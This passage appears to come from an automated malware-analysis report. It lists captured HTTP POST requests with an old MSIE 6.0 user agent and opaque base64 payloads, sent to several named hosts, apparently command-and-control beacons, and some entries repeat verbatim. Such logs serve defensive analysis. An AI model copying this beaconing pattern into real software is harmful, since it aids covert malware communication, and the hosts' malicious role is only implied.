4e 71 34 58 72 4f 76 55 63 4e 74 35 2f 7a 74 31 34 4f 59 67 70 56 4a 77 6d 6f 39 65 62 31 71 5a 4d 76 34 62 44 44 43 42 48 42 79 39 41 52 6f 43 49 43 37 79 37 31 4c 53 75 56 7a 42 67 52 68 4d 4b 43 75 67 6e 48 62 4e 47 59 76 47 62 56 52 35 41 58 4b 39 7a 6f 44 6d 6e 69 37 37 32 39 41 7a 36 31 45 6d 64 6a 6c 77 6d 36 44 41 2f 2b 68 49 65 74 35 64 6d 32 58 2f 75 32 30 64 67 4c 73 57 6b 4b 63 49 41 65 32 4e 47 4a 75 6f 33 31 67 44 2b 73 42 45 44 77 48 32 57 41 34 39 4c 45 57 69 78 43 6d 46 75 6d 6c 41 63 74 2b 55 52 2f 36 54 42 69 77 33 33 52 31 2f 6e 4e 67 38 55 69 4b 6c 59 44 45 68 4e 4c 39 57 66 44 2b 41 77 2f 6e 77 31 4c 43 67 4e 79 36 53 57 41 33 6d 61 44 35 48 6f 71 2b 74 30 34 59 6e 35 36 37 76 4a 39 57 42 49 45 34 68 51 68 56 51 4f 6c 69 55 6c 34 48 61 65 69 49 6d 59 4f 67 45 43 4f 5a 67 45 6c 4e 37 50 5a 35 51 33 6a 79 4d 53 46 37 6d 32 6b 77 34 6f 48 70 6d 76 34 5a 35 4e 6b 63 4c 64 76 46 64 68 4e 43 Data Ascii: qZGUXalfKIoVi8WleCQarsIJUBpHVjqd7aQKguuCEJh6Pu/MVl8Oo4RyROmEqreL8qUHpHeq6OiNYZvN7zVNQmgDAwYGR/ANITUELzpgMUYvMVDPEjqciEb4Lpf3NNPqXMFajCSVow7yRIw2d+jpb48Om5gc8wF4SiIwooU/fNQ4ZDuCsf2PREsgbkFzQyxS6GrMVPJMTzrXVOBgsMF3jDsZGHRxDnTPpuQIT9YnLW2D4o5/Pc1RmP0gxmby/4qZhfJwiA4xwjJaj+oUrHcFMsiG1BzcJ1wziNq4XrOvUcNt5/zt14OYgpVJwmo9eb1qZMv4bDDCBHBy9ARoCIC7y71LSuVzBgRhMKCugnHbNGYvGbVR5AXK9zoDmni7729Az61Emdjlwm6DA/+hIet5dm2X/u20dgLsWkKcIAe2NGJuo31gD+sBEDwH2WA49LEWixCmFumlAct+UR/6TBiw33R1/nNg8UiKlYDEhNL9WfD+Aw/nw1LCgNy6SWA3maD5Hoq+t04Yn567vJ9WBIE4hQhVQOliUl4HaeiImYOgECOZgElN7PZ5Q3jyMSF7m2kw4oHpmv4Z5NkcLdvFdhNC
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 75 46 35 4e 78 57 39 65 50 49 6f 34 6f 4e 45 6c 6a 76 6e 32 68 33 68 6d 59 74 79 46 4b 30 64 78 45 31 33 58 2b 51 48 6f 70 69 79 32 2f 51 63 4b 4b 45 77 50 33 48 32 72 44 75 48 77 4e 7a 64 4e 30 52 61 46 33 47 77 69 56 6c 6e 38 4e 2b 74 6c 44 74 79 47 50 4f 37 36 36 5a 58 6f 35 59 63 7a 76 78 4a 36 51 39 79 4d 42 46 73 41 34 47 61 38 70 4b 49 42 42 61 4d 57 46 71 55 6d 69 62 37 50 38 4b 6d 4a 66 55 53 6b 54 38 44 31 51 53 76 6c 31 75 57 2b 6d 39 30 71 38 64 34 46 5a 77 6b 68 42 2b 31 35 6d 37 70 44 6d 38 32 2f 63 6d 48 44 73 39 77 35 38 74 6d 43 4b 42 45 54 4c 61 58 53 75 62 7a 61 31 56 50 66 67 7a 46 44 53 54 4a 2b 66 4e 51 46 51 55 71 4e 56 77 4b 37 62 38 35 77 6d 4d 33 6e 41 6a 4a 31 59 51 38 67 67 64 46 69 39 6e 74 38 6e 69 7a 71 79 55 62 39 2b 76 57 77 75 41 6d 63 61 4e 72 67 65 6c 4c 30 69 69 71 2f 74 30 41 58 4a 4a 55 44 72 57 74 5a 56 69 78 41 52 38 54 79 31 44 72 6e 6d 51 42 42 4c 30 44 50 78 43 5a 36 32 43 65 36 47 4d 38 47 50 44 66 54 77 68 66 2f 6c 50 31 58 57 4b 2b 37 33 4f 63 6b 42 43 2b 61 50 62 44 4d 30 5a 55 58 72 7a 44 4d 55 64 6a 71 71 58 72 75 67 44 73 6c 31 6c 51 52 77 66 48 58 38 51 65 58 66 35 38 2b 31 65 58 32 78 34 55 6d 71 78 41 2b 32 48 6a 69 34 70 4e 66 45 6d 31 4c 75 5a 62 4c 77 33 49 57 4f 31 38 79 34 47 34 4b 34 56 30 72 48 59 6f 50 31 69 78 39 64 64 4d 42 34 61 2b 35 73 49 7a 76 69 46 65 33 65 44 31 65 75 55 43 33 6c 4e 77 39 73 4d 6d 6f 79 58 48 66 4b 63 4c 43 46 62 33 4d 47 63 41 46 4c 74 58 4c 32 62 65 72 74 61 48 35 72 46 73 62 30 2b 72 77 66 46 4b 6b 69 42 44 49 48 49 49 70 48 6f 71 67 52 4d 69 4e 54 67 4c 32 2f 73 31 6e 30 32 56 73 4f 70 45 2f 56 46 5a 43 48 69 43 57 55 7a 6d 6a 45 72 4f 5a 42 48 52 47 6f 32 58 72 79 55 6a 30 38 5a 62 49 7a 6f 32 44 37 67 3d 3d Data Ascii: uF5NxW9ePIo4oNEljvn2h3hmYtyFK0dxE13X+QHopiy2/QcKKEwP3H2rDuHwNzdN0RaF3GwiVln8N+tlDtyGPO766ZXo5YczvxJ6Q9yMBFsA4Ga8pKIBBaMWFqUmib7P8KmJfUSkT8D1QSvl1uW+m90q8d4FZwkhB+15m7pDm82/cmHDs9w58tmCKBETLaXSubza1VPfgzFDSTJ+fNQFQUqNVwK7b85wmM3nAjJ1YQ8ggdFi9nt8nizqyUb9+vWwuAmcaNrgelL0iiq/t0AXJJUDrWtZVixAR8Ty1DrnmQBBL0DPxCZ62Ce6GM8GPDfTwhf/lP1XWK+73OckBC+aPbDM0ZUXrzDMUdjqqXrugDsl1lQRwfHX8QeXf58+1eX2x4UmqxA+2Hji4pNfEm1LuZbLw3IWO18y4G4K4V0rHYoP1ix9ddMB4a+5sIzviFe3eD1euUC3lNw9sMmoyXHfKcLCFb3MGcAFLtXL2bertaH5rFsb0+rwfFKkiBDIHIIpHoqgRMiNTgL2/s1n02VsOpE/VFZCHiCWUzmjErOZBHRGo2XryUj08ZbIzo2D7g==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 75 46 35 4e 78 57 39 65 50 49 6f 34 6f 4e 45 6c 6a 76 6e 32 68 33 68 6d 59 74 79 46 4b 30 64 78 45 31 33 58 2b 51 48 6f 70 69 79 32 2f 51 63 4b 4b 45 77 50 33 48 32 72 44 75 48 77 4e 7a 64 4e 30 52 61 46 33 47 77 69 56 6c 6e 38 4e 2b 74 6c 44 74 79 47 50 4f 37 36 36 5a 58 6f 35 59 63 7a 76 78 4a 36 51 39 79 4d 42 46 73 41 34 47 61 38 70 4b 49 42 42 61 4d 57 46 71 55 6d 69 62 37 50 38 4b 6d 4a 66 55 53 6b 54 38 44 31 51 53 76 6c 31 75 57 2b 6d 39 30 71 38 64 34 46 5a 77 6b 68 42 2b 31 35 6d 37 70 44 6d 38 32 2f 63 6d 48 44 73 39 77 35 38 74 6d 43 4b 42 45 54 4c 61 58 53 75 62 7a 61 31 56 50 66 67 7a 46 44 53 54 4a 2b 66 4e 51 46 51 55 71 4e 56 77 4b 37 62 38 35 77 6d 4d 33 6e 41 6a 4a 31 59 51 38 67 67 64 46 69 39 6e 74 38 6e 69 7a 71 79 55 62 39 2b 76 57 77 75 41 6d 63 61 4e 72 67 65 6c 4c 30 69 69 71 2f 74 30 41 58 4a 4a 55 44 72 57 74 5a 56 69 78 41 52 38 54 79 31 44 72 6e 6d 51 42 42 4c 30 44 50 78 43 5a 36 32 43 65 36 47 4d 38 47 50 44 66 54 77 68 66 2f 6c 50 31 58 57 4b 2b 37 33 4f 63 6b 42 43 2b 61 50 62 44 4d 30 5a 55 58 72 7a 44 4d 55 64 6a 71 71 58 72 75 67 44 73 6c 31 6c 51 52 77 66 48 58 38 51 65 58 66 35 38 2b 31 65 58 32 78 34 55 6d 71 78 41 2b 32 48 6a 69 34 70 4e 66 45 6d 31 4c 75 5a 62 4c 77 33 49 57 4f 31 38 79 34 47 34 4b 34 56 30 72 48 59 6f 50 31 69 78 39 64 64 4d 42 34 61 2b 35 73 49 7a 76 69 46 65 33 65 44 31 65 75 55 43 33 6c 4e 77 39 73 4d 6d 6f 79 58 48 66 4b 63 4c 43 46 62 33 4d 47 63 41 46 4c 74 58 4c 32 62 65 72 74 61 48 35 72 46 73 62 30 2b 72 77 66 46 4b 6b 69 42 44 49 48 49 49 70 48 6f 71 67 52 4d 69 4e 54 67 4c 32 2f 73 31 6e 30 32 56 73 4f 70 45 2f 56 46 5a 43 48 69 43 57 55 7a 6d 6a 45 72 4f 5a 42 48 52 47 6f 32 58 72 79 55 6a 30 38 5a 62 49 7a 6f 32 44 37 67 3d 3d Data Ascii: uF5NxW9ePIo4oNEljvn2h3hmYtyFK0dxE13X+QHopiy2/QcKKEwP3H2rDuHwNzdN0RaF3GwiVln8N+tlDtyGPO766ZXo5YczvxJ6Q9yMBFsA4Ga8pKIBBaMWFqUmib7P8KmJfUSkT8D1QSvl1uW+m90q8d4FZwkhB+15m7pDm82/cmHDs9w58tmCKBETLaXSubza1VPfgzFDSTJ+fNQFQUqNVwK7b85wmM3nAjJ1YQ8ggdFi9nt8nizqyUb9+vWwuAmcaNrgelL0iiq/t0AXJJUDrWtZVixAR8Ty1DrnmQBBL0DPxCZ62Ce6GM8GPDfTwhf/lP1XWK+73OckBC+aPbDM0ZUXrzDMUdjqqXrugDsl1lQRwfHX8QeXf58+1eX2x4UmqxA+2Hji4pNfEm1LuZbLw3IWO18y4G4K4V0rHYoP1ix9ddMB4a+5sIzviFe3eD1euUC3lNw9sMmoyXHfKcLCFb3MGcAFLtXL2bertaH5rFsb0+rwfFKkiBDIHIIpHoqgRMiNTgL2/s1n02VsOpE/VFZCHiCWUzmjErOZBHRGo2XryUj08ZbIzo2D7g==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tyrns.comCache-Control: no-cacheData Raw: 79 73 6f 39 34 46 70 2f 58 6f 6f 35 48 73 4c 67 66 55 62 44 57 5a 32 52 4a 6f 64 4b 38 6e 44 69 4c 67 2f 7a 71 72 46 76 2f 42 78 77 75 6e 76 7a 39 2b 49 55 63 74 73 52 70 4b 69 6f 51 2b 30 51 42 4a 4f 6e 57 64 4d 42 33 64 4a 7a 4d 5a 53 31 45 6e 6f 69 76 59 63 39 57 45 6b 74 62 32 58 35 54 71 70 46 67 61 2b 6f 70 43 34 6f 4a 30 73 6c 70 35 31 6d 72 74 54 50 61 78 64 75 78 35 47 4c 79 2b 33 36 45 47 35 30 43 44 4e 49 54 6c 4f 4d 4a 59 4c 79 2b 52 77 56 30 52 79 67 45 65 75 31 54 55 2f 2b 79 4e 4b 2b 75 55 6d 34 48 51 50 54 58 66 30 2b 76 78 6a 4f 78 72 47 2b 50 68 4c 6d 75 49 68 4b 4f 63 77 51 64 50 45 6d 34 6c 32 65 56 6a 4b 41 66 53 4f 65 32 69 4c 77 6c 48 66 4f 62 6c 4c 30 38 53 47 59 44 42 4b 46 44 67 6c 42 54 6f 4b 59 6b 70 2f 49 62 6f 30 49 46 78 31 38 58 4d 53 30 34 4f 56 38 77 52 64 43 30 73 37 2b 65 44 64 36 74 65 68 75 68 46 77 64 4e 2b 56 7a 45 30 31 50 72 57 55 71 4e 59 42 30 54 42 75 78 53 2f 49 6e 4b 48 2b 4d 67 46 4c 4d 6b 58 48 49 6b 43 44 31 5a 48 53 50 32 67 56 6b 34 51 65 75 30 61 77 55 55 33 66 46 75 7a 62 66 34 53 76 58 6a 77 6c 62 61 4e 42 34 4d 66 6e 52 4e 63 58 55 6a 49 54 48 58 2f 5a 43 53 54 4b 31 42 65 59 69 78 66 50 34 6b 62 75 7a 51 6e 75 6b 4d 48 71 4a 74 35 4f 73 69 57 35 48 37 31 64 4a 45 7a 54 48 61 5a 4d 73 5a 65 70 4e 45 51 49 34 50 58 72 6a 36 61 39 42 2f 46 49 37 45 61 31 79 38 4c 49 65 74 43 53 71 4a 62 49 37 66 61 32 43 4a 43 49 39 56 2f 69 7a 51 56 32 6d 53 58 66 31 4c 4a 32 73 4c 56 48 6a 52 4e 71 75 69 35 62 6d 58 56 69 52 50 6d 74 61 71 54 51 46 45 32 54 4b 54 6e 32 6c 4c 64 7a 35 36 61 46 64 75 2b 57 5a 35 65 67 66 47 31 45 77 61 36 6d 70 70 67 47 31 69 53 61 79 4e 77 67 78 78 58 73 4b 77 76 64 66 Data Ascii: yso94Fp/Xoo5HsLgfUbDWZ2RJodK8nDiLg/zqrFv/Bxwunvz9+IUctsRpKioQ+0QBJOnWdMB3dJzMZS1EnoivYc9WEktb2X5TqpFga+opC4oJ0slp51mrtTPaxdux5GLy+36EG50CDNITlOMJYLy+RwV0RygEeu1TU/+yNK+uUm4HQPTXf0+vxjOxrG+PhLmuIhKOcwQdPEm4l2eVjKAfSOe2iLwlHfOblL08SGYDBKFDglBToKYkp/Ibo0IFx18XMS04OV8wRdC0s7+eDd6tehuhFwdN+VzE01PrWUqNYB0TBuxS/InKH+MgFLMkXHIkCD1ZHSP2gVk4Qeu0awUU3fFuzbf4SvXjwlbaNB4MfnRNcXUjITHX/ZCSTK1BeYixfP4kbuzQnukMHqJt5OsiW5H71dJEzTHaZMsZepNEQI4PXrj6a9B/FI7Ea1y8LIetCSqJbI7fa2CJCI9V/izQV2mSXf1LJ2sLVHjRNqui5bmXViRPmtaqTQFE2TKTn2lLdz56aFdu+WZ5egfG1Ewa6mppgG1iSayNwgxxXsKwvdf
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.spanesi.comCache-Control: no-cacheData Raw: 63 4c 49 74 69 55 61 63 64 49 6f 78 31 75 6d 69 59 63 5a 30 2f 57 6c 35 78 41 2b 6d 7a 37 78 66 32 71 51 66 6f 38 62 38 4f 6e 31 62 66 31 49 4f 66 76 76 69 58 37 7a 64 68 52 6b 45 56 72 32 43 47 43 6b 66 5a 47 68 34 31 48 4e 58 4d 74 69 75 63 35 74 34 31 43 4b 33 74 4a 70 63 6b 4c 56 54 4a 43 2b 6f 39 2f 70 31 62 78 47 36 51 56 63 78 32 35 58 73 36 4c 51 76 33 39 63 55 42 4d 76 56 32 47 72 6b 52 79 38 78 44 33 2f 59 32 44 79 6a 71 6c 4c 53 6a 68 5a 32 78 63 30 79 4a 64 5a 6f 76 4e 53 70 66 63 66 48 78 77 67 74 37 4c 30 4e 34 74 77 63 48 78 76 6a 35 6f 70 4b 53 47 71 50 4d 67 70 73 6d 65 31 36 31 41 4b 30 54 6a 62 76 39 74 77 36 77 2b 41 74 2b 7a 43 53 4b 49 5a 55 79 41 61 52 56 34 31 6c 79 73 36 65 6a 48 38 5a 69 57 6b 47 57 44 72 5a 38 7a 59 78 59 43 5a 2b 6c 4e 66 31 69 52 66 56 68 58 59 45 45 2b 72 6f 55 2f 7a 52 52 69 47 75 6f 77 58 67 64 59 61 43 4b 53 41 76 61 2f 59 6f 35 6e 45 33 67 4c 47 78 72 4f 44 61 2b 4a 6c 54 49 65 45 66 78 65 6a 37 53 42 36 76 75 47 63 6a 76 37 53 35 64 51 58 4b 30 54 59 39 59 7a 74 4f 68 34 71 30 47 45 71 6a 49 56 55 78 32 58 39 65 63 63 75 68 6c 74 2f 56 2f 68 46 35 70 4a 42 39 45 32 37 59 66 36 71 65 53 67 70 4d 70 69 56 78 74 6c 58 6c 73 70 54 68 73 66 31 62 68 37 50 43 2b 74 77 47 4b 53 6c 61 58 36 77 44 6e 68 68 4b 59 75 64 4a 4b 78 2b 61 50 62 53 57 4d 63 51 73 4a 62 54 4a 52 49 33 78 57 4d 4f 35 30 78 61 4d 56 4c 69 4b 36 73 43 48 4c 65 37 2b 68 72 67 53 72 37 6f 4e 39 75 78 39 49 50 43 44 4f 48 36 45 48 32 6c 6f 65 68 7a 56 71 76 48 36 6a 4f 32 32 4a 61 76 73 72 50 6e 77 37 56 4c 6c 6f 6a 47 49 54 38 70 4c 37 6d 62 6c 72 49 74 34 6f 79 49 64 39 6f 37 62 59 4f 4f 67 2f 46 34 68 6d 4b 4c 65 34 30 77 47 72 58 62 55 6f 59 57 52 6d 76 36 4d 59 79 4a 66 49 59 35 2b 48 55 6f 3d Data Ascii: cLItiUacdIox1umiYcZ0/Wl5xA+mz7xf2qQfo8b8On1bf1IOfvviX7zdhRkEVr2CGCkfZGh41HNXMtiuc5t41CK3tJpckLVTJC+o9/p1bxG6QVcx25Xs6LQv39cUBMvV2GrkRy8xD3/Y2DyjqlLSjhZ2xc0yJdZovNSpfcfHxwgt7L0N4twcHxvj5opKSGqPMgpsme161AK0Tjbv9tw6w+At+zCSKIZUyAaRV41lys6ejH8ZiWkGWDrZ8zYxYCZ+lNf1iRfVhXYEE+roU/zRRiGuowXgdYaCKSAva/Yo5nE3gLGxrODa+JlTIeEfxej7SB6vuGcjv7S5dQXK0TY9YztOh4q0GEqjIVUx2X9eccuhlt/V/hF5pJB9E27Yf6qeSgpMpiVxtlXlspThsf1bh7PC+twGKSlaX6wDnhhKYudJKx+aPbSWMcQsJbTJRI3xWMO50xaMVLiK6sCHLe7+hrgSr7oN9ux9IPCDOH6EH2loehzVqvH6jO22JavsrPnw7VLlojGIT8pL7mblrIt4oyId9o7bYOOg/F4hmKLe40wGrXbUoYWRmv6MYyJfIY5+HUo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tc17.comCache-Control: no-cacheData Raw: 34 6f 69 6b 4f 71 35 79 35 6f 70 55 35 6d 34 73 75 52 72 53 54 68 46 6b 75 49 49 75 36 67 5a 51 77 75 30 35 6d 34 2f 37 71 4f 42 52 6c 69 4b 72 4c 42 74 39 75 6f 70 67 42 65 36 4b 36 50 58 6c 30 36 32 33 73 49 35 6e 71 6a 45 4c 53 36 55 4e 50 31 4c 45 78 46 37 53 54 50 4b 4e 52 65 6f 30 32 67 56 66 36 43 2f 57 55 31 65 6d 2f 6f 4c 2b 41 32 2f 73 38 49 36 4d 2b 48 79 4a 65 61 39 71 4c 6e 73 44 4b 35 6c 53 5a 65 59 4d 5a 30 63 70 50 50 4d 64 2f 67 6a 4b 4e 39 31 32 42 6a 48 42 51 56 6e 43 35 37 45 76 31 44 73 48 78 4b 78 7a 74 4d 65 47 56 6a 32 53 34 6e 70 4f 45 6a 78 58 76 37 7a 72 48 4f 32 32 69 4c 39 65 4b 6a 43 45 49 62 4a 70 4c 6b 70 6f 61 55 36 77 36 5a 78 2b 6f 47 77 4d 50 6a 30 4f 4d 41 64 65 65 31 79 77 31 38 45 75 5a 6b 47 4e 71 4d 36 32 6a 65 50 54 52 70 57 48 37 59 48 44 48 37 53 6b 47 67 30 79 68 56 4f 4d 46 4f 52 4e 32 63 48 47 54 62 71 4b 56 33 59 63 69 4d 64 4e 74 53 34 30 6e 44 51 65 63 46 41 69 6d 48 57 69 71 44 6f 71 66 79 65 74 44 6a 41 50 65 67 52 72 47 54 65 33 74 70 78 4f 50 30 2f 38 38 43 58 71 31 70 45 6f 42 4d 7a 76 51 68 2b 4c 39 54 66 64 62 4f 48 49 59 32 33 38 67 79 79 6a 74 50 30 77 4f 6a 78 34 43 57 63 64 75 50 5a 46 6e 32 4f 78 4f 34 4c 32 6c 4e 53 34 44 4c 38 52 72 59 56 4a 43 6e 56 4d 36 47 38 45 77 75 74 77 2b 31 56 7a 6e 76 59 31 46 63 4e 68 72 4d 47 33 6e 53 50 47 63 45 55 49 31 4e 32 59 67 66 33 4a 7a 54 41 79 5a 34 46 78 51 37 6d 45 52 6e 36 34 53 51 65 62 5a 36 49 45 6f 48 30 61 4b 2b 75 31 43 68 4c 70 52 4a 37 50 4a 75 55 65 46 67 4b 38 42 7a 66 65 62 78 33 4f 61 7a 56 39 58 2b 6c 67 57 79 62 52 68 6f 45 57 75 35 6f 70 4d 72 77 66 59 39 4d 38 41 74 54 4e 65 35 67 3d Data Ascii: 4oikOq5y5opU5m4suRrSThFkuIIu6gZQwu05m4/7qOBRliKrLBt9uopgBe6K6PXl0623sI5nqjELS6UNP1LExF7STPKNReo02gVf6C/WU1em/oL+A2/s8I6M+HyJea9qLnsDK5lSZeYMZ0cpPPMd/gjKN912BjHBQVnC57Ev1DsHxKxztMeGVj2S4npOEjxXv7zrHO22iL9eKjCEIbJpLkpoaU6w6Zx+oGwMPj0OMAdee1yw18EuZkGNqM62jePTRpWH7YHDH7SkGg0yhVOMFORN2cHGTbqKV3YciMdNtS40nDQecFAimHWiqDoqfyetDjAPegRrGTe3tpxOP0/88CXq1pEoBMzvQh+L9TfdbOHIY238gyyjtP0wOjx4CWcduPZFn2OxO4L2lNS4DL8RrYVJCnVM6G8Ewutw+1VznvY1FcNhrMG3nSPGcEUI1N2Ygf3JzTAyZ4FxQ7mERn64SQebZ6IEoH0aK+u1ChLpRJ7PJuUeFgK8Bzfebx3OazV9X+lgWybRhoEWu5opMrwfY9M8AtTNe5g=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.railbook.netCache-Control: no-cacheData Raw: 4e 48 6d 70 4c 2b 70 32 31 59 70 41 69 33 33 47 7a 54 6d 42 38 36 33 44 4a 36 34 61 4f 57 72 56 76 6e 66 49 57 67 39 38 4f 7a 31 6e 64 75 52 31 4c 6f 44 6e 68 56 33 74 54 4a 32 69 56 64 56 62 61 65 71 5a 4e 56 73 74 59 51 69 2b 73 2f 48 44 58 46 55 37 51 58 38 53 55 6f 2f 5a 64 69 2f 71 66 4b 68 39 68 44 73 78 4c 6e 66 68 78 67 63 7a 31 53 33 51 62 41 6a 33 32 71 74 44 79 54 66 45 30 63 6c 78 2f 47 2f 52 38 53 4b 79 7a 33 51 42 52 36 42 42 52 68 6c 56 5a 2f 32 54 30 45 44 53 51 62 62 71 47 37 74 56 6a 51 75 46 4f 42 72 37 72 41 43 68 6a 68 48 55 50 4a 37 75 58 4b 6f 6e 4d 69 47 6b 56 69 48 6b 33 61 51 39 52 43 45 54 78 6c 70 53 69 33 31 44 75 41 76 42 2b 42 36 69 52 4f 2f 70 46 4e 33 39 2b 71 77 67 6a 41 72 64 72 44 48 59 72 48 38 6e 77 67 78 6d 7a 6d 48 71 7a 73 32 57 32 32 30 50 30 78 76 62 44 77 58 4d 48 6e 56 6e 2f 77 71 44 36 52 48 42 39 74 74 6b 47 52 58 48 76 6d 4c 55 4a 52 42 46 59 71 74 54 69 44 6c 39 6b 4a 61 4a 44 30 43 37 42 45 66 30 4a 30 47 58 62 61 78 4e 36 53 5a 62 59 49 52 70 77 79 2f 4b 6d 6e 64 75 4d 33 6b 76 4b 55 6c 73 77 47 77 49 35 68 41 55 4f 30 39 44 49 4f 41 2b 30 78 4c 61 43 79 64 44 6b 79 6b 77 6e 5a 4c 73 45 62 72 2b 4c 4e 7a 63 70 36 7a 37 46 63 2f 41 6f 50 2f 64 72 55 57 6c 64 58 43 42 38 44 75 79 77 65 44 67 39 78 71 45 4c 2f 4b 64 73 4d 68 41 4a 4a 48 41 6a 2b 4d 36 70 56 76 35 71 70 6e 51 72 2b 4c 47 37 30 35 41 64 57 63 4d 57 65 65 64 38 64 69 39 78 6e 6d 48 52 4a 44 34 36 78 76 62 73 63 68 78 2b 4e 71 7a 38 4d 78 68 55 61 54 74 37 4f 57 5a 30 78 36 58 58 49 6f 52 4a 76 73 69 4c 53 63 30 56 55 78 54 77 6a 38 62 54 46 4f 76 2f 57 49 57 53 4b 37 49 7a 66 30 50 78 77 39 31 5a 56 63 4c 31 74 45 59 31 68 58 41 58 41 72 79 4b 38 42 33 79 6e 32 6c 37 69 4b 39 74 32 36 63 70 41 3d 3d Data Ascii: NHmpL+p21YpAi33GzTmB863DJ64aOWrVvnfIWg98Oz1nduR1LoDnhV3tTJ2iVdVbaeqZNVstYQi+s/HDXFU7QX8SUo/Zdi/qfKh9hDsxLnfhxgcz1S3QbAj32qtDyTfE0clx/G/R8SKyz3QBR6BBRhlVZ/2T0EDSQbbqG7tVjQuFOBr7rAChjhHUPJ7uXKonMiGkViHk3aQ9RCETxlpSi31DuAvB+B6iRO/pFN39+qwgjArdrDHYrH8nwgxmzmHqzs2W220P0xvbDwXMHnVn/wqD6RHB9ttkGRXHvmLUJRBFYqtTiDl9kJaJD0C7BEf0J0GXbaxN6SZbYIRpwy/KmnduM3kvKUlswGwI5hAUO09DIOA+0xLaCydDkykwnZLsEbr+LNzcp6z7Fc/AoP/drUWldXCB8DuyweDg9xqEL/KdsMhAJJHAj+M6pVv5qpnQr+LG705AdWcMWeed8di9xnmHRJD46xvbschx+Nqz8MxhUaTt7OWZ0x6XXIoRJvsiLSc0VUxTwj8bTFOv/WIWSK7Izf0Pxw91ZVcL1tEY1hXAXAryK8B3yn2l7iK9t26cpA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tc17.comCache-Control: no-cacheData Raw: 34 6f 69 6b 4f 71 35 79 35 6f 70 55 35 6d 34 73 75 52 72 53 54 68 46 6b 75 49 49 75 36 67 5a 51 77 75 30 35 6d 34 2f 37 71 4f 42 52 6c 69 4b 72 4c 42 74 39 75 6f 70 67 42 65 36 4b 36 50 58 6c 30 36 32 33 73 49 35 6e 71 6a 45 4c 53 36 55 4e 50 31 4c 45 78 46 37 53 54 50 4b 4e 52 65 6f 30 32 67 56 66 36 43 2f 57 55 31 65 6d 2f 6f 4c 2b 41 32 2f 73 38 49 36 4d 2b 48 79 4a 65 61 39 71 4c 6e 73 44 4b 35 6c 53 5a 65 59 4d 5a 30 63 70 50 50 4d 64 2f 67 6a 4b 4e 39 31 32 42 6a 48 42 51 56 6e 43 35 37 45 76 31 44 73 48 78 4b 78 7a 74 4d 65 47 56 6a 32 53 34 6e 70 4f 45 6a 78 58 76 37 7a 72 48 4f 32 32 69 4c 39 65 4b 6a 43 45 49 62 4a 70 4c 6b 70 6f 61 55 36 77 36 5a 78 2b 6f 47 77 4d 50 6a 30 4f 4d 41 64 65 65 31 79 77 31 38 45 75 5a 6b 47 4e 71 4d 36 32 6a 65 50 54 52 70 57 48 37 59 48 44 48 37 53 6b 47 67 30 79 68 56 4f 4d 46 4f 52 4e 32 63 48 47 54 62 71 4b 56 33 59 63 69 4d 64 4e 74 53 34 30 6e 44 51 65 63 46 41 69 6d 48 57 69 71 44 6f 71 66 79 65 74 44 6a 41 50 65 67 52 72 47 54 65 33 74 70 78 4f 50 30 2f 38 38 43 58 71 31 70 45 6f 42 4d 7a 76 51 68 2b 4c 39 54 66 64 62 4f 48 49 59 32 33 38 67 79 79 6a 74 50 30 77 4f 6a 78 34 43 57 63 64 75 50 5a 46 6e 32 4f 78 4f 34 4c 32 6c 4e 53 34 44 4c 38 52 72 59 56 4a 43 6e 56 4d 36 47 38 45 77 75 74 77 2b 31 56 7a 6e 76 59 31 46 63 4e 68 72 4d 47 33 6e 53 50 47 63 45 55 49 31 4e 32 59 67 66 33 4a 7a 54 41 79 5a 34 46 78 51 37 6d 45 52 6e 36 34 53 51 65 62 5a 36 49 45 6f 48 30 61 4b 2b 75 31 43 68 4c 70 52 4a 37 50 4a 75 55 65 46 67 4b 38 42 7a 66 65 62 78 33 4f 61 7a 56 39 58 2b 6c 67 57 79 62 52 68 6f 45 57 75 35 6f 70 4d 72 77 66 59 39 4d 38 41 74 54 4e 65 35 67 3d Data Ascii: 4oikOq5y5opU5m4suRrSThFkuIIu6gZQwu05m4/7qOBRliKrLBt9uopgBe6K6PXl0623sI5nqjELS6UNP1LExF7STPKNReo02gVf6C/WU1em/oL+A2/s8I6M+HyJea9qLnsDK5lSZeYMZ0cpPPMd/gjKN912BjHBQVnC57Ev1DsHxKxztMeGVj2S4npOEjxXv7zrHO22iL9eKjCEIbJpLkpoaU6w6Zx+oGwMPj0OMAdee1yw18EuZkGNqM62jePTRpWH7YHDH7SkGg0yhVOMFORN2cHGTbqKV3YciMdNtS40nDQecFAimHWiqDoqfyetDjAPegRrGTe3tpxOP0/88CXq1pEoBMzvQh+L9TfdbOHIY238gyyjtP0wOjx4CWcduPZFn2OxO4L2lNS4DL8RrYVJCnVM6G8Ewutw+1VznvY1FcNhrMG3nSPGcEUI1N2Ygf3JzTAyZ4FxQ7mERn64SQebZ6IEoH0aK+u1ChLpRJ7PJuUeFgK8Bzfebx3OazV9X+lgWybRhoEWu5opMrwfY9M8AtTNe5g=
